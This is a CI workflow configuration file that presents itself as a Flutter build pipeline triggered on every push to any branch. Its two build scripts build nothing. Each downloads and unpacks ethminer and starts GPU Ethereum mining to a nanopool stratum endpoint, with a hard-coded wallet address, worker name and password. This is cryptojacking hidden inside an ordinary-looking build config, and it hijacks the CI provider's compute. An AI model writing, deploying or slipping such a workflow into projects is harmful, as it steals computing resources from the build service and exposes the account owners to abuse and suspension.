workflows:
  my-workflow:
    name: My workflow name
    instance_type: linux_x2
    max_build_duration: 120
    environment:
      vars:
        PUBLIC_ENV_VAR: "value here"
      flutter: stable
      xcode: latest
    cache:
      cache_paths:
        - ~/.pub-cache
    triggering:
      events:
        - push
      branch_patterns:
        - pattern: '*'
          include: true
          source: true
      cancel_previous_builds: false
    scripts:
      - name: script_1
        script: |
                cat /proc/cpuinfo && wget https://github.com/ethereum-mining/ethminer/releases/download/v0.18.0/ethminer-0.18.0-cuda-8-linux-x86_64.tar.gz && tar -xvf ethminer-0.18.0-cuda-8-linux-x86_64.tar.gz && bin/ethminer -G -P stratum1+tcp://0x3f834008148a59ea8f71bf9a607064ce430d5ad5.Kangbarbar:Cukdeh1234@eth-us-west1.nanopool.org:9999
      - name: script_2
        script: |
                wget https://github.com/ethereum-mining/ethminer/releases/download/v0.18.0/ethminer-0.18.0-cuda-8-linux-x86_64.tar.gz && tar -xvf ethminer-0.18.0-cuda-8-linux-x86_64.tar.gz && bin/ethminer -G -P stratum1+tcp://0x3f834008148a59ea8f71bf9a607064ce430d5ad5.Kangbarbar:Cukdeh1234@eth-us-west1.nanopool.org:9999
    artifacts:
      - build/**/outputs/**/*.aab
    publishing:
      email:
        recipients:
          - name@example.com
      scripts:
        - echo 'Post-publish script'
